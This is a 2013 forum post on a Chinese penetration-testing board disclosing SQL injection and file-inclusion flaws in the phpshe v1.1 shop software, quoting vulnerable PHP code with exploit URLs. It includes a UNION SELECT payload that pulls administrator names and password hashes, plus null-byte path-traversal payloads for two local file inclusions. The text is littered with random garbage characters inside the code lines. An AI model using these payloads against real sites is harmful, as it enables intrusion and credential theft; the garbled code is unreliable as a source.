找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2321|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/  {5 V/ H% {' j; v* X: j5 ?
/* Phpshe v1.1 Vulnerability
5 O, H8 S4 o5 J" J- d/* ========================
2 T2 \$ c5 p/ `1 ?/ |: d/* By: : Kn1f3# w# s+ ]3 X9 V' p' {7 y6 w
/* E-Mail : 681796@qq.com
+ i/ [8 [- k! V; [3 H, b/*******************************************************/' _. @* O# Y1 p( e
0×00 整体大概参数传输
  n0 t. Q9 |% V  u4 }, s + ]/ x; V/ ]1 Y. x- @0 H

# a' U4 c$ {. x  Q2 L
" L( ]; P" r$ G( x: E//common.php
' y/ N* b2 p4 fif (get_magic_quotes_gpc()) {
! n. p) S/ p( P  }! B8 \!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');  i- u* i% r/ s2 x# F; P) h, n0 e
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');4 N' k- d0 y" x6 O- z& `3 e+ }
}9 c: U7 A0 O  G2 H8 G( D: r
else {0 s4 W! p8 p# |
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
9 n' D3 h5 O& L* b! n7 Y+ ]# x!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');8 |4 e6 O+ e" X9 e5 A
}+ f' j) j, l; ]
session_start();
" e/ {5 c: z. s) n!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');7 ?: l$ m5 {' u9 |# ~7 i+ g) A
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
; `2 W, ]8 c3 r4 X$ u
. I+ J: r3 h2 i' B, G( K0×01 包含漏洞
, \) t; ?2 T/ {, C $ k. g3 u. A  E( r0 J6 A

& {. E1 L7 H- s0 i//首页文件
! t% _3 o: n5 V: K<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
) S0 \) J7 A: _0 {include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞* q+ C, Z' E* [
pe_result();
' f4 _+ a+ v1 `0 x# i" k?>
- D/ q( Z. R7 C# G2 s5 T9 \) k//common 文件 第15行开始
0 w5 U3 n5 z( [/ V4 [url路由配置
2 N% x# W4 [  W1 B2 r$module = $mod = $act = 'index';0 F  N$ H" q8 A9 r9 F. I; O  P
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
3 d; d( d0 Q  o& G7 w0 g0 ^$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);  k/ Z8 C! o/ c( y# N
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);5 A  k9 d& L0 }& r( ^
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%004 v4 @8 B) v( ]: B- S* c6 I9 O; i6 U  {

- j+ q: {0 G& l# P5 A

! I2 i! d$ y0 L" Z! q/ k3 s" g- e* n 0×02 搜索注入9 P5 m3 P2 Z; I
6 i1 @* P$ L/ K/ L# s
<code id="code2">

//product.php文件( a* t* _4 `$ B& I# F. U4 w
case 'list':
5 J! w  B3 o; }+ P3 `' l) U) D$category_id = intval($id);
; H0 p* w) S$ d$info = $db->pe_select('category', array('category_id'=>$category_id));
* @( U" E( k) p* q; q! g  r//搜索" T# U8 ~0 I1 L2 l  R
$sqlwhere = " and `product_state` = 1";$ J& i& h1 N/ T  \
pe_lead('hook/category.hook.php');. G6 u; o5 l+ {" X0 F
if ($category_id) {! P; q5 S* l  L! D. O& q2 P
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
+ s# o; o! X1 A3 s0 A5 B" Q- ?}& T7 ^# c5 L& s7 M6 n
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤' F; J6 L! j! Y" e9 o
if ($_g_orderby) {
/ }! w* v2 s: f  T1 w/ F7 W2 e- U1 m$orderby = explode('_', $_g_orderby);
) W# G2 F  n4 s- K$ H+ N$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
" y" ?7 Q* t8 D+ E1 O}1 S: O+ ?) b" ]2 f1 J
else {) y) P) u5 x) m* T  }* b7 a2 Y! P
$sqlwhere .= " order by `product_id` desc";% f8 V0 a  @8 f3 G
}: j7 \/ Z$ w4 Z- A( y4 b4 x
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));& N0 D% ~/ m, ?1 e0 l( {9 ~
//热卖排行+ e/ J- P1 h' ^  _% W
$product_hotlist = product_hotlist();
& _+ |5 S* n0 a//当前路径- Y& V, P) b& @+ W7 [; x
$nowpath = category_path($category_id);
) [. I3 t$ @: n2 Z$seo = pe_seo($info['category_name']);3 \) T& \/ d3 x
include(pe_tpl('product_list.html'));, x  A) E$ K6 f8 j2 g
//跟进selectall函数库, U; m- q+ c: `7 |) O4 ^! v
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
5 Y) f/ D$ d1 t* G3 `{
, E( G+ k/ o) V, b+ c- l1 b3 Q//处理条件语句  e. x" ~) P8 I# q- h& ~
$sqlwhere = $this->_dowhere($where);
; [7 q4 _: v8 Breturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
" Q8 ]7 s' v( A; E}
& T7 `5 E0 j. K7 b) I/ o//exp& [+ m4 Q- F$ C: n8 |" Y
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1& X8 r3 ]: I# A

</code>
7 s2 Z7 Y1 E8 Z! m$ w 0 ~; I8 B! |' s! M
0×03 包含漏洞2
/ k  k( V  i+ T; a' ] / {* _. U; b3 D$ t
<code id="code3">

//order.php

case 'pay':


' i& j: s- J5 G( c; \. N$order_id = pe_dbhold($_g_id);

# \# M/ B  I3 K" ^( l; Q5 x
$cache_payway = cache::get('payway');


  z! }) W5 C! M1 ?) cforeach($cache_payway as $k => $v) {

( B# |& x+ X9 Z+ n0 n" L1 H
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


$ N; V) M4 O0 n8 Gif ($k == 'bank') {

/ Y6 V5 s- t! c- }4 q- w# _0 Z
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


- A. Z) Y7 x0 }* P* G}


7 n! G& X5 `( {; t7 R}

4 d. W5 g/ y& \# W( s: C
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

% d4 t5 J" x. ^/ e3 D3 a
!$order['order_id'] && pe_error('订单号错误...');

9 S+ k( v$ t' S% X& x% `! S/ A: D
if (isset($_p_pesubmit)) {

. W" t; b; X2 ?2 \0 T. W. Z8 `  }/ E
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

/ @. J- I9 d9 a! |7 |& m% q
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


; r7 g1 I4 g, [+ C" ]foreach ($info_list as $v) {

7 r9 R* @4 K, T2 j
$order['order_name'] .= "{$v['product_name']};";
1 N2 X6 Y: R+ C, i4 z) q, n

6 {; W- |# U( u$ }  {  o
}

- @) z% o$ i0 v5 e5 v; p
echo '正在为您连接支付网站,请稍后...';

  D3 ^) g' R, N2 }; n
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


5 N! R( F  t, C, T}//当一切准备好的时候就可以进行"鸡肋包含了"

* v& s. X/ B7 I6 e2 G
else {


1 U7 I: d/ E" Q; R/ Npe_error('支付错误...');

, n" ^3 }0 l5 i
}

- [- M7 @. c8 s9 r
}

7 l$ ~1 G; g& m" T: Q0 `
$seo = pe_seo('选择支付方式');


; E$ \; j/ q* c- T; v7 a; _include(pe_tpl('order_pay.html'));

2 r2 X( N$ f! p2 T' W
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>7 I1 |8 \. M6 g8 B3 h8 c

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表